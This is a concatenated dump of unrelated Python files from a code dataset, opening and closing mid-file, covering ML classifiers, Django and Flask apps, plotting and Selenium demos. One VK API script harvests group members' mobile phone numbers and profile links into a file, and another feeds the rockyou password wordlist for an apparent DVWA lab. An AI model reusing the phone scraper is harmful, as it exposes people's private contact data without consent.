3\"}))\n data.children.append(TestObj(returns=None))\n\n ret = pylidator.validate(data, {pylidator.ERROR: [validate_child]}, providers=_providers)\n import pprint\n\n pprint.pprint(ret.get_full_results())\n self.assertEqual(\n [\n {\"description\": \"Child 0\", \"level\": \"ERROR\", \"message\": \"hi\", \"validation_type\": None},\n {\"description\": \"Child 1\", \"level\": \"ERROR\", \"message\": \"there\", \"validation_type\": None},\n {\"description\": \"Child 1\", \"level\": \"ERROR\", \"message\": \"you\", \"validation_type\": None},\n {\n \"description\": \"Child 2\",\n \"field\": \"field1\",\n \"level\": \"ERROR\",\n \"message\": \"Field1: ['Error 1', 'Error 2']\",\n \"validation_type\": None,\n \"verbose_name\": \"Field1\",\n },\n {\n \"description\": \"Child 2\",\n \"field\": \"field2\",\n \"level\": \"ERROR\",\n \"message\": \"Field2: Error 3\",\n \"validation_type\": None,\n \"verbose_name\": \"Field2\",\n },\n ],\n ret.get_full_results(),\n )\n\n def test_validator_with_constants_service_returns_string_results_in_error(self):\n data = TestObj(returns=\"failed.\")\n cs = MyContext()\n ret = pylidator.validate(\n data,\n {pylidator.ERROR: [validate_parent_with_constants_service]},\n providers=_providers,\n extra_context={\"constants_service\": cs},\n )\n self.assertTrue(data.it_happened)\n self.assertEqual([{\"level\": \"ERROR\", \"message\": \"failed.\", \"validation_type\": None}], ret.get_full_results())\n\n def test_validator_requesting_unavailable_context_throws(self):\n data = TestObj(returns=\"failed.\")\n cs = MyContext()\n with self.assertRaises(ContextNotAvailableError):\n ret = pylidator.validate(\n data,\n {pylidator.ERROR: [validate_parent_with_constants_service]},\n providers=_providers,\n extra_context={\"not_constants_service\": cs},\n )\n","sub_path":"pylidator/tests/pylidator_test.py","file_name":"pylidator_test.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"550678324","text":"#!/usr/bin/env python\n# -*- coding: utf-8; mode: 
python; -*-\n\n\"\"\"Module providing abstract interface class for Wang sense classification.\n\nAttributes:\n WangBaseSenser (class):\n abstract class defining interface for explicit and implicit classifier\n\n\"\"\"\n\n##################################################################\n# Imports\nfrom __future__ import absolute_import, print_function\n\nfrom dsenser.base import BaseSenser\nfrom dsenser.constants import SENSE\n\nimport abc\nimport numpy as np\n\n\n##################################################################\n# Class\nclass WangBaseSenser(BaseSenser):\n \"\"\"Abstract class for disambiguating relation senses.\n\n Attributes:\n n_y (int): number of distinct classes\n\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def train(self, a_train_data, a_dev_data=None, a_n_y=-1,\n a_i=-1, a_train_out=None, a_dev_out=None):\n \"\"\"Method for training the model.\n\n Args:\n a_train_data (2-tuple(list, dict)):\n list of training JSON data\n a_dev_data (2-tuple(list, dict) or None):\n list of development JSON data\n a_n_y (int):\n number of distinct classes\n a_i (int):\n row index for the output predictions\n a_train_out (np.array or None):\n predictions for the training set\n a_dev_out (np.array or None):\n predictions for the training set\n\n Returns:\n void:\n\n Note:\n updates ``a_train_out`` and ``a_dev_out`` in place\n\n \"\"\"\n self.n_y = a_n_y\n x_train, y_train = self._generate_ts(a_train_data)\n x_dev, y_dev = self._generate_ts(a_dev_data)\n # fit the model\n self._model.fit([el[-1] for el in x_train], y_train)\n if a_i >= 0:\n if a_train_out is not None:\n for i, x_i in x_train:\n self._predict(x_i, a_train_out[i], a_i)\n if a_dev_out is not None:\n for i, x_i in x_dev:\n self._predict(x_i, a_dev_out[i], a_i)\n\n def predict(self, a_rel, a_data, a_ret, a_i):\n \"\"\"Method for predicting sense of single relation.\n\n Args:\n a_rel (dict):\n discourse relation whose sense should be predicted\n a_data (2-tuple(dict, dict)):\n list of input JSON data\n a_ret (np.array):\n output prediction vector\n a_i (int):\n row index in the output vector\n\n Returns:\n void:\n\n Note:\n updates ``a_ret[a_i]`` in place\n\n \"\"\"\n feats = self._extract_features(a_rel, a_data[-1])\n self._predict(feats, a_ret, a_i)\n\n @abc.abstractmethod\n def _extract_features(self, a_rel, a_parses):\n \"\"\"Extract classification features for a given relation.\n\n Args:\n a_rel (dict):\n discourse relation to extract features for\n a_parses (dict):\n parsed sentences\n\n Returns:\n void:\n\n \"\"\"\n raise NotImplementedError\n\n def _predict(self, a_feats, a_ret, a_i):\n \"\"\"Method for predicting sense of single relation.\n\n Args:\n a_feats (dict):\n features of the input instance\n a_ret (np.array):\n output prediction vector\n a_i (int):\n row index in the output vector\n\n Returns:\n void:\n updates ``a_ret[a_i]`` in place\n\n \"\"\"\n # obtain model's estimates\n dec = self._model.decision_function(a_feats)\n if len(dec.shape) > 1:\n dec = np.mean(dec, axis=0)\n # normalize using softmax\n exp_ret = np.exp(sum(dec)) or 1e10\n dec /= exp_ret\n # map model's classes to original indices\n for i, ival in enumerate(dec):\n a_ret[a_i][self._model.classes_[i]] += ival\n\n def _free(self):\n \"\"\"Free resources used by the model.\n\n \"\"\"\n self.n_y = -1\n\n def _generate_ts(self, a_data):\n \"\"\"Generate training set.\n\n Args:\n a_data (2-tuple(list, dict)):\n input data (discourse relations and parses)\n\n Returns:\n tuple(list, list):\n lists of input features and expected classes\n\n \"\"\"\n 
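# x collects (row index, feature dict) pairs; y collects the gold sense indices\n        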
x, y = [], []\n if a_data is None:\n return (x, y)\n x_i = y_i = None\n # generate features\n for i, irel in a_data[0]:\n x_i = self._extract_features(irel, a_data[1])\n if not x_i:\n continue\n x.append((i, x_i))\n y_i = np.argmax(irel[SENSE])\n y.append(y_i)\n return (x, y)\n","sub_path":"dsenser/wang/wangbase.py","file_name":"wangbase.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"365539171","text":"from rest_framework import serializers\n\nfrom .models import Recording, Topic\n\n\nclass TopicSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Topic\n fields = ('id', 'name', 'show', 'publish_status')\n\n\nclass RecordingSerializer(serializers.ModelSerializer):\n class Meta:\n model = Recording\n fields = ('topic', 'user_id', 'file_name')\n","sub_path":"app_recording/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"40473492","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport csv\n\n\ndef get_data(FILENAME):\n vdrain = []\n ichannel = []\n\n with open(FILENAME, 'r') as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n if i==0 : continue\n vdrain.append(5+float(row[0]))\n ichannel.append(-float(row[1]))\n\n return np.array(vdrain), np.array(ichannel)\n\n\ndef early_voltage(FILENAME, limits):\n vdrain_o, ichannel_o = get_data(FILENAME)\n\n data = zip(vdrain_o, ichannel_o)\n data = [ i for i in data if i[0] > limits[0] and i[0] < limits[1] ]\n\n vdrain = [i[0] for i in data]\n ichannel = [i[1] for i in data]\n\n\n fit = np.polyfit(vdrain, ichannel, 1)\n \n v_early = 1/ (fit[0]) * fit[1]\n print(1/fit[0])\n print(fit[1])\n #print(-v_early)\n\n return fit[1], -v_early\n\n #plt.figure()\n #plt.semilogy(vdrain_o, ichannel_o)\n #plt.semilogy(vdrain, ichannel)\n \n\n\nif __name__ == \"__main__\":\n\n i_sat0, v_early0 = early_voltage(\"../data/experiment3_pmos_weak_4.csv\", [ 3.4, 4.8 ])\n i_sat1, v_early1 = early_voltage(\"../data/experiment3_pmos_moderate_3.csv\", [ 3.4, 4.8 ])\n i_sat2, v_early2 = early_voltage(\"../data/experiment3_pmos_strong_4.csv\", [ 0, 2 ])\n\n plt.semilogx(i_sat0, v_early0, 'X', label=\"Weak Inversion\")\n plt.semilogx(i_sat1, v_early1, 'X', label=\"Moderate Inversion\")\n plt.semilogx(i_sat2, v_early2, 'X', label=\"Strong Inversion\")\n\n plt.title(\"pMOS Early Voltage\")\n plt.ylabel(\"Early Voltage (V)\")\n plt.xlabel(\"$I_{sat}$ (A)\")\n plt.legend()\n plt.show()\n","sub_path":"lab5/plottingScripts/plotting3_pmos_early.py","file_name":"plotting3_pmos_early.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"4690673","text":"import logging\n\nimport requests\nfrom flask import Blueprint\nfrom flask import flash, g, redirect, render_template, request, session, url_for, current_app\nfrom flask import logging as flask_logging\n\nfrom . 
import db\nfrom .common import AMAZON_PROFILE_REQUEST, AMAZON_TOKEN_REQUEST\nfrom .common import load_logged_in_user, login_required, generate_uuid as _uuid\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER.addHandler(flask_logging.default_handler)\n_LOGGER.setLevel(logging.DEBUG)\n\nbp = Blueprint('user', __name__, url_prefix='/user')\n\n\n@bp.before_app_request\ndef before_app_request():\n    load_logged_in_user()\n\n\n@bp.route('/')\ndef thing_index():\n    return redirect(url_for('user.profile'))\n\n\n@bp.route('/login')\ndef login():\n    return render_template('user/login.html')\n\n\n@bp.route('/logout')\ndef logout():\n    session.clear()\n    return redirect(url_for('user.login'))\n\n\n@bp.route('/handle_login')\ndef handle_login():\n    request_args = request.args\n    if 'error' in request_args:\n        _LOGGER.debug('%s: %s', request_args['error'], request_args['error_description'])\n        error = request_args['error_description']\n    elif 'code' in request_args:\n        code = request_args['code']\n\n        auth_code_response = requests.post(AMAZON_TOKEN_REQUEST, data={\n            'grant_type': 'authorization_code',\n            'code': code,\n            'redirect_uri': url_for('user.handle_login', _external=True, _scheme='https'),\n            'client_id': current_app.config['AMAZON_CLIENT_ID'],\n            'client_secret': current_app.config['AMAZON_CLIENT_SECRET']\n        })\n        auth_code_json = auth_code_response.json()\n\n        if auth_code_response.status_code != 200:\n            _LOGGER.debug('%s: %s', auth_code_json['error'], auth_code_json['error_description'])\n            error = auth_code_json['error_description']\n        else:\n            access_token = auth_code_json['access_token']\n\n            profile_response = requests.get(AMAZON_PROFILE_REQUEST.format(access_token))\n            profile_json = profile_response.json()\n\n            if profile_response.status_code != 200:\n                _LOGGER.debug('%s: %s', profile_json['error'], profile_json['error_description'])\n                error = profile_json['error_description']\n            else:\n                amazon_id = profile_json['user_id']\n                email = profile_json['email']\n\n                user_id = db.create_or_update_user(email, amazon_id)\n\n                session.clear()\n                session['user_id'] = user_id\n                return redirect(url_for('user.profile'))\n\n    else:\n        error = 'Unknown response from Amazon: {}'.format(request_args)\n\n    flash(error)\n    return render_template('user/login.html')\n\n\n@bp.route('/profile', methods=['GET', 'POST'])\n@login_required\ndef profile():\n    if request.method == 'POST': # Generate only 'user scope' uuid\n        user_id = g.user['id']\n        db.update_user_scope_uuid(user_id, _uuid())\n        g.user = db.find_user_by_id(user_id) # refresh user with new 'user scope' for request\n        return redirect(url_for('user.profile')) # avoid browser asking for re-submit form on refresh action\n\n    return render_template('user/profile.html')\n","sub_path":"raspi-cloud-controller/cloud_flask/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"501629807","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. 
Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nimport os\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom django.views.static import serve\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.i18n import i18n_patterns # ADD: translation\n\n# Up two folders to serve \"site\" content\nurlpatterns = i18n_patterns( # ADD: translation\n path('admin/', admin.site.urls),\n path('', TemplateView.as_view(template_name='home/main.html')),\n path('', include('home.urls')),\n path('timetable_tool/', include('timetable_tool.urls')),\n path('accounts/', include('django.contrib.auth.urls')),\n)\nurlpatterns += [\n url(r'^oauth/', include('social_django.urls', namespace='social')), # Keep\n url(r'^i18n/',include('django.conf.urls.i18n')),]\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nSITE_ROOT = os.path.join(BASE_DIR, 'site')\n# NOTE: change SITE_ROOT to BASE_DIR\nurlpatterns += [\n url(r'^site/(?P.*)$', serve,\n {'document_root': SITE_ROOT, 'show_indexes': True},\n name='site_path'\n ),\n]\n\n# Serve the favicon - Keep for later\nurlpatterns += [\n path('favicon.ico', serve, {\n 'path': 'favicon.ico',\n 'document_root': os.path.join(BASE_DIR, 'home/static'),\n }\n ),\n]\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.conf.urls.static import static\nurlpatterns += staticfiles_urlpatterns()\n\n# Switch to social login if it is configured - Keep for later\ntry:\n from . import github_settings\n social_login = 'registration/login_social.html'\n urlpatterns = i18n_patterns(path('accounts/login/', auth_views.LoginView.as_view(template_name=social_login)),) + urlpatterns\n print('Using',social_login,'as the login template')\nexcept:\n print('Using registration/login.html as the login template')\n\n# References\n\n# https://docs.djangoproject.com/en/3.0/ref/urls/#include\n","sub_path":"mysite/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"10019500","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\nstock_index_eng = create_engine(\n 'mysql+pymysql://root:root@localhost:3306/stock_index',\n echo=False,\n encoding='utf8')\nappend_name = \"深证综指\"\ndf = pd.read_csv(\"data/append_stock_chg_ser.csv\", index_col=[\"trade_date\"])\ntmp = pd.read_sql(append_name, stock_index_eng, index_col=[\"trade_date\"], columns=[\"pct_chg\"])\ntmp.columns = [append_name]\ndf = df.join(tmp, how='outer')\ndf.to_csv(\"data/append_stock_chg_ser.csv\", encoding='utf-8')\n","sub_path":"stock_analyse/Indexed/append_stock_chg_ser.py","file_name":"append_stock_chg_ser.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"384207213","text":"import codecs\nfrom subprocess import Popen, PIPE\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.nonmultipart import MIMENonMultipart\nfrom email.mime.text import MIMEText\n\n\nclass Basemail(object):\n\n def encode(self, mailfrom, rcptto, subject,\n replyto=None, cc=None, bcc=None,\n htmlpart='', textpart='', charset='utf-8'):\n if htmlpart and textpart:\n message = MIMEMultipart('alternative')\n elif htmlpart:\n 
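# HTML-only message: a single text/html part\n            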
message = MIMENonMultipart('text', 'html')\n elif textpart:\n message = MIMENonMultipart('text', 'plain')\n else:\n return None\n\n message['From'] = str(mailfrom)\n message['To'] = ', '.join(rcptto) if isinstance(\n rcptto, list) else rcptto\n message['Subject'] = str(subject)\n if replyto:\n message['Reply-To'] = str(replyto)\n if cc:\n message['Cc'] = ', '.join(cc) if isinstance(cc, list) else cc\n if bcc:\n message['Bcc'] = ', '.join(bcc) if isinstance(bcc, list) else bcc\n\n htmlpart = codecs.encode(htmlpart, charset)\n textpart = codecs.encode(textpart, charset)\n\n if htmlpart and textpart:\n plaintext = MIMEText(textpart.decode(), 'plain')\n htmltext = MIMEText(htmlpart.decode(), 'html')\n message.attach(plaintext)\n message.attach(htmltext)\n elif htmlpart:\n message.set_payload(htmlpart, charset=charset)\n elif textpart:\n message.set_payload(textpart, charset=charset)\n else:\n return None\n\n self.message = message\n return message\n\n\nclass SendMail(Basemail):\n\n def __init__(self, sendmail_path='/usr/sbin/sendmail'):\n self.sendmail_path = sendmail_path\n\n def send(self, message=None):\n if message is None:\n message = self.message\n\n sendmail = Popen([self.sendmail_path, \"-t\"], stdin=PIPE)\n sendmail.communicate(message.as_string().encode())\n","sub_path":"django/utils/send-email-sendmail.py","file_name":"send-email-sendmail.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261761220","text":"import requests as req\nimport json\n\nbase_url = 'https://api.vk.com/method/{}'\n\n\ndef isInt(n):\n try:\n n.replace('+', '')\n int(n)\n return True\n except Exception:\n return False\n\n\n# A function which writes service_key from json file\ndef get_key(path, get):\n with open(path, 'r') as f:\n fJson = json.loads(f.read())\n key = fJson[get]\n f.close()\n return key\n\n\n# Returns response from certain vk API method\ndef api(method, **kwargs):\n __params = {'access_token': service_key, 'v': 5.95}\n for i, j in kwargs.items():\n __params[i] = j\n r = req.get(base_url.format(method), params=__params).json()\n return r\n\n\ndef getMobilePhones(group_id):\n r = api('groups.getById', group_id=group_id, fields='members_count')\n members_count = r['response'][0]['members_count']\n for offset in range(0, members_count, 1000):\n r = api('groups.getMembers', group_id=group_id, count=1000, offset=offset)\n for user_id in r['response']['items']:\n r = api('users.get', user_ids=user_id, fields='contacts')\n if 'mobile_phone' in r['response'][0].keys():\n mobile_phone = r['response'][0]['mobile_phone'].lower()\n if isInt(mobile_phone):\n yield (mobile_phone, user_id)\n\n\ndef main():\n global service_key\n service_key = get_key('keys.json', 'service_key')\n print('Type the group Id or its domain: ', end='')\n group_id = str(input())\n with open('phone.txt', 'w') as f:\n for phone, userId in getMobilePhones(group_id):\n print(phone)\n f.write('{0}:https://vk.com/id{1}{2}'.format(phone, userId, '\\n'))\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"104914078","text":"##########\n# Import #\n##########\nimport os\nimport socket\nimport ast\n\n########\n# Init #\n########\n# All lines in hosts fole\nlines=[]\n\n# Block list in hosts file\nlinesBody= []\n\n# Destination\nfileOutput= 
open('/etc/hosts','w+')\n\n# This directory\ndir = os.path.dirname(__file__)\n#############\n# Functions #\n#############\ndef removeStart(s, skip):\n return s[skip:]\n\n####################################\n# Add original start of hosts file #\n####################################\nlines.append('127.0.0.1\\tlocalhost')\nlines.append('127.0.1.1\\t' + socket.gethostname())\n\n################\n# Remote files #\n################\nremoteInputs = []\nfilename = os.path.join(dir, 'remote.conf')\nwith open(filename,'r') as inf:\n for line in inf:\n remoteInputs.append(ast.literal_eval(line))\n\nfor remoteList in remoteInputs:\n filename = os.path.join(dir, remoteList[\"name\"])\n fileInput = open(filename,'r')\n candidateList = fileInput.read().splitlines()\n fileInput.close()\n \n del candidateList[:remoteList[\"rowSkip\"]]\n candidateList = [removeStart(s, remoteList[\"charSkip\"]) for s in candidateList]\n\n preDomains=[]\n for preLists in remoteList[\"preList\"]:\n filename = os.path.join(dir, preLists)\n fileInput = open(filename,'r')\n preDomainsLines = fileInput.read().splitlines()\n fileInput.close()\n for line in preDomainsLines:\n preDomains.append(line)\n \n for newBlock in candidateList:\n linesBody.append(newBlock)\n for preDomain in preDomains:\n linesBody.append(preDomain+ '.' + newBlock)\n\n#############\n# Whitelist #\n#############\nfilename = os.path.join(dir, 'whiteList.txt')\nfileInput = open(filename,'r')\nvetolist = fileInput.read().splitlines()\nfileInput.close()\n\nfor veto in vetolist:\n if veto in linesBody:\n linesBody.remove(veto)\n\n#####################\n# Create hosts file #\n#####################\nfor newBlock in linesBody:\n lines.append('0.0.0.0\\t' + newBlock)\n \n##################################\n# Add original end of hosts file #\n##################################\nlines.append('')\nlines.append('# The following lines are desirable for IPv6 capable hosts')\nlines.append('::1 ip6-localhost ip6-loopback')\nlines.append('fe00::0 ip6-localnet')\nlines.append('ff00::0 ip6-mcastprefix')\nlines.append('ff02::1 ip6-allnodes')\nlines.append('ff02::2 ip6-allrouters')\n\n#################\n# Write to file #\n#################\nfor item in lines:\n fileOutput.write(\"%s\\n\" % item)\nfileOutput.close()\n","sub_path":"hostsGen.py","file_name":"hostsGen.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"343332898","text":"#!/usr/bin/python3\n\nwordlist = \"rockyou.txt\"\nusers_file = open(wordlist, encoding=\"ISO-8859-1\")\nusers = users_file.read()\nw = \"\"\nfor ch in users :\n if(ch == ' ' or ch == '\\n') :\n print(w)\n w = \"\"\n else :\n w += ch\nusers_file.close()\n","sub_path":"C3i/DVWA/nice.py","file_name":"nice.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"141832969","text":"from yacs.config import CfgNode as ConfigurationNode\n\n# YACS overwrite these settings using YAML\n\n__C = ConfigurationNode()\n\n# importing default as a global singleton\ncfg = __C\n\n__C.DATASET = ConfigurationNode()\n__C.DATASET.NAME = 'bengali_kaggle'\n__C.DATASET.DEFAULT_SIZE = (137, 236)\n__C.DATASET.RESIZE_SHAPE = (128, 128)\n__C.DATASET.CONCENTRATE_CROP = True\n__C.DATASET.GRAPHEME_SIZE = 168\n__C.DATASET.VOWEL_SIZE = 11\n__C.DATASET.CONSONANT_SIZE = 7\n__C.DATASET.TRAIN_DATA_PATH = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/train_data.p'\n__C.DATASET.VAL_DATA_PATH = 
'C:/Users/nasty/data-science/kaggle/bengali/data/interim/val_data.p'\n__C.DATASET.TRAIN_DATA_SAMPLE = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/train_data_sample.p'\n__C.DATASET.VALID_DATA_SAMPLE = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/train_data_sample.p'\n\n\n__C.DATASET.AUGMENTATION = ConfigurationNode()\n__C.DATASET.AUGMENTATION.BLURRING_PROB = 0.25\n__C.DATASET.AUGMENTATION.GAUSS_NOISE_PROB = 0.25\n__C.DATASET.AUGMENTATION.BRIGHTNESS_CONTRAST_PROB = 1\n__C.DATASET.AUGMENTATION.GRID_DISTORTION_PROB = 1\n__C.DATASET.AUGMENTATION.ROTATION_PROB = 1\n__C.DATASET.AUGMENTATION.ROTATION_DEGREE = 20\n__C.DATASET.AUGMENTATION.COARSE_DROPOUT_PROB = 0.4\n\n__C.DATASET.BATCH_SIZE = 32\n__C.DATASET.CPU_NUM = 1\n__C.DATASET.TO_RGB = True\n__C.DATASET.NORMALIZE_MEAN = [0.485, 0.456, 0.406]\n__C.DATASET.NORMALIZE_STD = [0.229, 0.224, 0.225]\n\n__C.MODEL = ConfigurationNode()\n__C.MODEL.META_ARCHITECTURE = 'baseline'\n__C.MODEL.NORMALIZATION_FN = 'BN'\n\n__C.MODEL.BACKBONE = ConfigurationNode()\n__C.MODEL.BACKBONE.NAME = 'mobilenet_v2'\n__C.MODEL.BACKBONE.PRETRAINED_PATH = r'C:/Users/nasty/data-science/kaggle/bengali/bengali-julien/models/mobilenet_v2-b0353104.pth'\n\n__C.MODEL.HEAD = ConfigurationNode()\n__C.MODEL.HEAD.NAME = 'simple_head'\n__C.MODEL.HEAD.ACTIVATION = 'leaky_relu'\n__C.MODEL.HEAD.OUTPUT_DIMS = [168, 11, 7]\n__C.MODEL.HEAD.INPUT_DIM = 1280 # 1000 = densenet121\n__C.MODEL.HEAD.HIDDEN_DIMS = [512, 256]\n__C.MODEL.HEAD.BN = True\n__C.MODEL.HEAD.DROPOUT = -1\n\n__C.MODEL.SOLVER = ConfigurationNode()\n__C.MODEL.SOLVER.OPTIMIZER = 'adam'\n__C.MODEL.SOLVER.BASE_LR = 0.001\n__C.MODEL.SOLVER.LOSS_FN = 'xentropy'\n__C.MODEL.SOLVER.TOTAL_EPOCHS = 5\n__C.MODEL.SOLVER.LABELS_WEIGHTS_PATH = 'C:/Users/nasty/data-science/kaggle/bengali/data/interim/labels_weights.p'\n\n__C.OUTPUT_PATH = 'C:/Users/nasty/data-science/kaggle/bengali-git/bengali.ai/models'\n__C.RESUME_PATH = ''\n\ndef get_cfg_defaults():\n    \"\"\"\n    Get a yacs CfgNode object with default values for my_project.\n    \"\"\"\n    # Return a clone so that the defaults will not be altered\n    # This is for the \"local variable\" use pattern recommended by the YACS repo.\n    # It will be subsequently overwritten with local YAML.\n    return __C.clone()","sub_path":"src/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"610483419","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nA = np.array([[5, 5], [5, 5]])\nb = np.array([10, 20])\n\n\na1 = A[:, 0]\na2 = A[:, 1]\n\n\nfig = plt.figure() \nax = fig.add_subplot(1, 1, 1)\n\n\n# draw the span generated by a1 and a2\nline_x = []\nline_y = []\n\nfor c1 in np.linspace(-5, 25, 25):\n    for c2 in np.linspace(-5, 25, 25):\n        c1_a1 = a1*c1\n        c2_a2 = a2*c2\n        sum = c1_a1 + c2_a2\n        line_x.append(sum[0])\n        line_y.append(sum[1])\n\nplt.plot(line_x, line_y, color=\"red\", zorder=1)\n\n\n# draw the vectors a1, a2, and b\nplt.quiver(0, 0, a1[0], a1[1], angles='xy', scale_units='xy', scale=1, zorder=2)\nplt.quiver(0, 0, a2[0], a2[1], angles='xy', scale_units='xy', scale=1, zorder=2)\nplt.quiver(0, 0, b[0], b[1], angles='xy', scale_units='xy', scale=1, color=\"blue\")\nplt.text(a1[0], a1[1], \"a1=a2\", size=15, zorder=2)\nplt.text(b[0], b[1], \"b\", size=15)\n\n\n\nax.axis([-3, 12, -3, 22])\nax.set_xticks(range(-3, 12))\nax.set_yticks(range(-3, 22))\nax.grid()\nax.set_axisbelow(True)\nax.set_aspect('equal', 
adjustable='box')\n\nax.spines['left'].set_position('zero')\nax.spines['bottom'].set_position('zero')\n\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\n\nplt.show()\n","sub_path":"선형대수 1일차/수업 자료/소스코드/3장/3.9/3.9-193.py","file_name":"3.9-193.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"333785651","text":"from . import *\nimport urllib2\nimport re\nfrom yakr.util import unescape\n_URL_RE = \"(https?[^\\s]*)\"\n\n@privmsg\ndef title(who, what, where):\n    res = re.search(_URL_RE, what)\n    if not res:\n        return\n    url = res.group(0)\n    try:\n        content = urllib2.urlopen(url, None, 5).read(4096)\n    except urllib2.HTTPError:\n        say(where, \"Aww that website hates robots! ROBOT HATER!\")\n        return\n    except Exception as e:\n        say(where, \"O.o %r\" % e.message )\n        return\n    if content.find(\"<title\") == -1:\n        return\n    title_content = content.split(\"</title>\")[0].split(\">\")[-1]\n    title_content = re.sub(\"\\W+\", \" \", title_content) #clean up whitespace\n\n    title = unescape(title_content)\n\n    say(where, \"<{B}Title{}: {C7}%s{}>\" % title)\n\n","sub_path":"plugins/titles.py","file_name":"titles.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"627257590","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver import ActionChains\n\nbroswer = webdriver.Chrome()\ntry:\n    broswer.get('https://www.baidu.com')\n    input = broswer.find_element_by_id('kw')\n    input.send_keys('Python')\n    input.send_keys(Keys.ENTER)\n    wait = WebDriverWait(broswer, 10)\n    wait.until(EC.presence_of_element_located((By.ID, 'content_left')))\n    print(broswer.current_url)\n    print(broswer.get_cookies())\n    print(broswer.page_source)\nfinally:\n    broswer.close()\n\nbroswer = webdriver.Chrome()\nurl = 'http://www.runoob.com/try/try.php?filename=jqueryui-api-droppable'\nbroswer.get(url)\nbroswer.switch_to.frame('iframeResult')\nsource = broswer.find_element_by_css_selector('#draggable')\ntarget = broswer.find_element_by_css_selector('#droppable')\nactions = ActionChains(broswer)\nactions.drag_and_drop(source, target)\nactions.perform()\nbroswer.close()\n\nbroswer = webdriver.Chrome()\nbroswer.get('https://www.zhihu.com/explore')\nbroswer.execute_script('window.scrollTo(0, document.body.scrollHeight)')\nbroswer.execute_script('alert(\"To Bottom\")')\nbroswer.close()\n\nbroswer = webdriver.Chrome()\nbroswer.get('https://www.zhihu.com/explore')\nlogo = broswer.find_element_by_id('zh-top-link-logo')\nprint(logo)\nprint(logo.get_attribute('class'))\ninput = broswer.find_element_by_class_name('zu-top-add-question')\nprint(input.text)\nprint(input.id)\nprint(input.location)\nprint(input.tag_name)\nprint(input.size)\nbroswer.close()","sub_path":"selenium_test.py","file_name":"selenium_test.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"543346941","text":"import unittest\nimport random\nimport threading\nfrom utility import matrix, random_seed\n\ndef matrix_multiply_vec_multithreaded(A, x):\n    row = A.row()\n    y = matrix(row, 1)\n    \n    threads = [] \n    \n    def mul_row(A, x, y, i):\n        col = A.col()\n        for j in range(col):\n            y[i][0] += 
